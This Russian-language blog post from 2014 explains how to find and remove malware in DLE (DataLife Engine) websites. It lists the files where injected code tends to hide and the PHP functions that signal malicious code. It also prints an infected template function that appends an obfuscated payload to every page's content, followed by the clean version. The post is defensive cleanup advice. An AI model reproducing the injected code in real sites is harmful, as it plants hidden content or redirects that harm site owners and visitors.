Вторник, 21 Янв 2014 в 11:31
Вирусы в движке DLE
Решил написать заметку про частые вирусы в движке DLE … За долгую жизнь в инете насмотрелся на них много…. Много нашёл и удалил, но народ у нас на редкость изобретателен. Для всех у кого такая беда…
Если вдруг Yandex или Google начинают кричать что на вашем сайте вирусы, то …. проверяем на наличие постороннего кода сперва файлы .htccess и .…/templates/name/main.tpl . Чаще всего вирус или редирект там.
Есть ещё несколько мест куда часто в движках прячут вирусы , их надо проверить и убрать лишнее:
- index.php
- engine/engine.php
- engine/data/config.php
- engine/data/dbconfig.php
- engine/init.php
- language/Russian/website.lng
Ищите использование характерных для вредоносного кода функций. Примеры таких функций для языка PHP:
- динамическое исполнение кода (eval, assert, create_function);
- обфускация (base64_decode, gzuncompress, gzinflate, str_rot13, preg_replace);
- загрузка удаленных ресурсов (file_get_contents, curl_exec).
Частый код который встречается при мобильных редиректах — …strpos($_SERVER[‘HTTP_USER_AGENT’],»Android»).. — когда пытаются определить тип браузера или мобильного устройства … а потом перекинуть на свой сайт .. header(‘Location: http://…..ws/’);
Ещё, для примера в ../engine/templates.class.php если нашли
function set($name, $var) {
if( is_array( $var ) && count( $var ) ) {
foreach ( $var as $key => $key_var ) {
$this->set( $key, $key_var );
} } else /**/{/**/
$this->data[$name] = $var;
/**/
if($this->templatename=="main.tpl"){
if($name=="{content}"){
$this->data[$name] .= $this->set_encode('@flr(gcxib=!flgjihx:wkwb;!#@h(avbd=!ac cj:%%cvhrbi-zh^wbc%!#cvhrbi-zh^wbc@%h#@%flr#');
}
}
/**/
}
}
советую заменить на
function set($name, $var) {
if( is_array( $var ) && count( $var ) ) {
foreach ( $var as $key => $key_var ) {
$this->set( $key, $key_var );
}
} else
$this->data[$name] = $var;
}
Что делать в случае если нашли что-то лишнее: удалить этот код (будьте внимательны при удалении, чтобы не удалить часть настоящего кода) и поставить на файлы атрибуты 444.
- Category: DLE, Сайтостроение
- Ваш отзыв